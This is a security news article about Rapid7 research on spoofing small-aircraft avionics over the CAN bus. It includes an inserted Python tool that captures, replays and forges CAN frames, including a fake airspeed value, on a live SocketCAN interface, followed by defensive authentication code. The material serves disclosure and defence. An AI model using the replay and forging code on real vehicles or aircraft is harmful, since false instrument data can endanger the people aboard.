Attackers with physical access to a small aircraft can inject false data onto the plane's avionics CAN bus and manipulate the readings on key navigation and flight instruments, researchers have found.

The Department of Homeland Security issued an alert Tuesday warning that small aircraft are vulnerable to hackers who can gain physical access to a plane. It warned that such an attacker can manipulate aircraft telemetry data, which could result in loss of control of the airplane.

The bulletin was issued after researchers at Rapid7 released a lengthy report on the ease with which a malicious actor with access to an aircraft's Controller Area Network (CAN) bus can tamper with it. CAN is a serial bus standard, used by automobiles and small aircraft, that lets microcontrollers and devices exchange messages directly with one another without a host computer. Every node on a bus segment sees every frame, and a classic CAN frame carries no indication of which node actually sent it.

In its security alert, the DHS' Cybersecurity and Infrastructure Security Agency drew from the Rapid7 report, stating, “An attacker with physical access to the aircraft could attach a device to an avionics CAN bus that could be used to inject false data, resulting in incorrect readings in avionic equipment.” CAN bus injection is behind multiple hacks of cars, including researchers Chris Valasek and Charlie Miller's famous remote hack of a Jeep Cherokee in 2015. Since then, automobile CAN buses have been compromised to take control of a number of cars, including those made by Tesla and Volkswagen.

When it comes to small aircraft, Patrick Kiley, senior security consultant and penetration tester with Rapid7 and the author of the report, points out that “modern aircraft systems are becoming increasingly reliant on networked communications systems to display information to the pilot as well as control various systems aboard aircraft.”

In many such aircraft there is no direct mechanical linkage between the pilot's controls and the systems they command, such as wing flaps, trim, the engine and the autopilot. “This is similar to how most modern automobiles no longer have a physical connection between the throttle and the actuator that causes the engine to accelerate,” he wrote.

As part of its investigation, Rapid7 looked at two commercially available avionics systems and successfully sent false data to both, feeding the pilot bogus engine telemetry readings, incorrect compass and attitude readings (the attitude indicator was formerly known as the gyro horizon), fake airspeed and critical angle-of-attack data. Researchers did not reveal the names of the avionics vendors.

“Such an attacker could attach a device—or co-opt an existing attached device—to an avionics CAN bus in order to inject false measurements and communicate them to the pilot,” Kiley wrote. He also emphasized that physical access to the airplane is a prerequisite for the hack.

Hack Details and Mitigation Suggestions

The research involved connecting a USB2CAN adapter to the targeted CAN bus. From a Linux host running the can-utils tools, the researchers could then capture and inspect the frames exchanged between the avionics units.

“The system was reverse-engineered by sending individual recorded CAN packets back onto the avionics bus and observing what effects they had with the various nodes,” according to the researcher. “This reversing technique is particularly effective in CAN bus explorations compared to other networking environments, since CAN bus implementations are often susceptible to replay attacks.”

By replaying captured frames and sending crafted ones, Rapid7 was able to produce incorrect attitude, heading and airspeed indications, among other false readings.
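The capture, replay and craft loop just described, as an added example written here and not Rapid7's tooling: it parses `candump -l` style log lines (the four lines are constructed sample data, not a real capture), groups frames by arbitration ID, packs them into the `struct can_frame` layout that a Linux SocketCAN `CAN_RAW` socket sends, replays a single ID through a caller-supplied sender, and overwrites one field of a recorded frame. The arbitration IDs and the float32 airspeed layout are assumptions made for the example; the report did not disclose the vendors' message formats.

```python
"""Constructed walk-through of capture -> group -> replay -> craft on a
CAN bus. Added example; IDs, log lines and the signal layout are made up."""
import struct
from collections import defaultdict

# candump -l writes one frame per line: "(timestamp) iface ID#HEXDATA".
# Constructed sample data, not a real avionics capture.
SAMPLE_CANDUMP_LOG = """\
(1564000000.100000) can0 1A0#0000C8420000803F
(1564000000.110000) can0 1A1#3C0000000000
(1564000000.200000) can0 1A0#0000C8420000803F
(1564000000.210000) can0 1A1#3D0000000000
"""

# struct can_frame as seen by a CAN_RAW socket: can_id, can_dlc, 3 pad, data[8]
CAN_FRAME_FMT = "=IB3x8s"


def parse_candump_line(line):
    """Return (timestamp, iface, can_id, data) for one candump -l log line."""
    ts, iface, frame = line.split()
    can_id_hex, data_hex = frame.split("#", 1)
    return float(ts.strip("()")), iface, int(can_id_hex, 16), bytes.fromhex(data_hex)


def parse_candump_log(text):
    return [parse_candump_line(l) for l in text.splitlines() if l.strip()]


def group_by_id(frames):
    """Map arbitration ID -> list of payloads in capture order."""
    by_id = defaultdict(list)
    for _ts, _iface, can_id, data in frames:
        by_id[can_id].append(data)
    return dict(by_id)


def pack_can_frame(can_id, data):
    """Pack a classic CAN frame into the 16-byte struct can_frame layout."""
    if len(data) > 8:
        raise ValueError("classic CAN payload is at most 8 bytes")
    return struct.pack(CAN_FRAME_FMT, can_id, len(data), data.ljust(8, b"\x00"))


def unpack_can_frame(raw):
    can_id, dlc, data = struct.unpack(CAN_FRAME_FMT, raw)
    return can_id, data[:dlc]


def replay_one_id(by_id, can_id, send):
    """Replay every recorded frame with one arbitration ID, in recorded order.
    `send` is any callable taking the packed frame (sock.send on a real
    AF_CAN socket, or a list's append for dry runs). Returns the count sent."""
    n = 0
    for data in by_id.get(can_id, []):
        send(pack_can_frame(can_id, data))
        n += 1
    return n


# Hypothetical layout, assumed for this example only: ID 0x1A0 carries a
# little-endian float32 airspeed in knots in bytes 0..3.
def decode_hypothetical_airspeed(data):
    return struct.unpack("<f", data[0:4])[0]


def craft_hypothetical_airspeed(data, knots):
    """Copy a recorded 0x1A0 frame, replacing only the airspeed field."""
    return struct.pack("<f", knots) + data[4:]


def socketcan_sender(iface="vcan0"):
    """Real sender for Linux SocketCAN (Linux only; needs the interface up)."""
    import socket
    s = socket.socket(socket.AF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
    s.bind((iface,))
    return s.send
```

Replaying one ID at a time is what makes the observation step tractable: if an instrument changes only when ID 0x1A0 is replayed, that ID is the one to study further. On a real bus, pass `socketcan_sender("can0")` as `send`; the length check in `pack_can_frame` matters because `struct can_frame` has only eight data bytes, so a longer payload would need a CAN FD socket and `struct canfd_frame` instead.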

“An attack against the autopilot and attitude indicator could lead to an unusual attitude and potentially loss of control of the aircraft, given that forged CAN bus messages can create disastrous scenarios very quickly,” researchers wrote.

To prevent this type of hacking, Rapid7 suggests the aviation industry take a page from automakers. In automotive networking there have been significant efforts to mitigate malicious CAN bus traffic, researchers said. Those efforts have included CAN bus-specific filtering, whitelisting and firewalls.

“[Those automobile efforts] do not appear to have gotten much traction in avionics networking, at least in the avionics systems favored by pilots of small aircraft,” Kiley wrote. He recommended a message authentication protocol to address the “open ended nature of CAN bus.” He also suggested moving to CAN FD (CAN with Flexible Data-Rate), which raises the maximum payload of a frame from eight bytes to 64 and allows a faster data phase; classic CAN's eight-byte payload leaves little room for a counter and an authentication tag alongside the measurement itself.

“Some of that extra space can now be used for security-critical features such as replay protection and cryptographic hashing,” he wrote.
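The two defenses discussed above, automotive-style allow-listing of arbitration IDs and a message authentication scheme with replay protection that only fits in the larger CAN FD payload, as an added example written here; this is illustration code, not a published avionics protocol and not Rapid7's code. The shared key, the 32-bit per-ID monotonic counter, the 16-byte truncated HMAC-SHA256 tag and the ID values are all assumptions made for the example.

```python
"""Added example: ID allow-list plus authenticated, replay-protected CAN FD
frames. Key, layout and tag length are assumptions, not a real standard."""
import hashlib
import hmac
import struct

CAN_FD_MAX_PAYLOAD = 64
CLASSIC_CAN_MAX_PAYLOAD = 8
TAG_LEN = 16          # truncated HMAC-SHA256 tag (assumed length)
COUNTER_FMT = ">I"    # 32-bit per-ID monotonic counter (assumed)

# Assumed shared key, provisioned out of band (e.g. at installation).
DEMO_KEY = bytes.fromhex("00112233445566778899aabbccddeeff" * 2)


def _mac(key, can_id, counter, payload):
    """Tag binds ID, counter and payload so none can be swapped independently."""
    msg = struct.pack(">I", can_id) + struct.pack(COUNTER_FMT, counter) + payload
    return hmac.new(key, msg, hashlib.sha256).digest()[:TAG_LEN]


def build_authenticated_frame(key, can_id, counter, payload):
    """CAN FD data field laid out as payload || counter || tag."""
    data = payload + struct.pack(COUNTER_FMT, counter) + _mac(key, can_id, counter, payload)
    if len(data) > CAN_FD_MAX_PAYLOAD:
        raise ValueError("payload too large for one CAN FD frame")
    return data


def classic_can_fits(payload_len):
    """Whether payload + counter + tag would fit a classic 8-byte frame."""
    return payload_len + 4 + TAG_LEN <= CLASSIC_CAN_MAX_PAYLOAD


class AvionicsReceiver:
    """Receiver (or gateway) that filters by ID, verifies the tag, then
    enforces a strictly increasing counter per ID to defeat replay."""

    def __init__(self, key, allowed_ids):
        self.key = key
        self.allowed_ids = set(allowed_ids)
        self.last_counter = {}   # can_id -> highest counter accepted so far

    def accept(self, can_id, data):
        """Return (accepted, reason, payload). Order matters: the tag is
        checked before the counter so unauthenticated frames cannot be used
        to probe or advance the replay window."""
        if can_id not in self.allowed_ids:
            return False, "id not allow-listed", None
        if len(data) < TAG_LEN + 4:
            return False, "frame too short for counter and tag", None
        payload = data[:-(TAG_LEN + 4)]
        counter = struct.unpack(COUNTER_FMT, data[-(TAG_LEN + 4):-TAG_LEN])[0]
        tag = data[-TAG_LEN:]
        if not hmac.compare_digest(tag, _mac(self.key, can_id, counter, payload)):
            return False, "bad tag", None
        if counter <= self.last_counter.get(can_id, -1):
            return False, "replayed or stale counter", None
        self.last_counter[can_id] = counter
        return True, "ok", payload
```

`classic_can_fits` shows why the eight-byte classic frame is the obstacle: four bytes of counter plus a 16-byte tag already exceed it, with no room for the measurement. Two caveats a real deployment would have to settle: the counter must survive power cycles (or be reset under a fresh session nonce at start-up), and any legacy node on the same bus that still sends unauthenticated frames remains a spoofing target until it is upgraded or isolated behind a gateway.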

Rapid7 plans to discuss its findings further next week at the Aviation Village at DEF CON 27, taking place Aug. 8 through 11. Be sure to follow all DEF CON 27 and Black Hat coverage right here at Threatpost starting next week.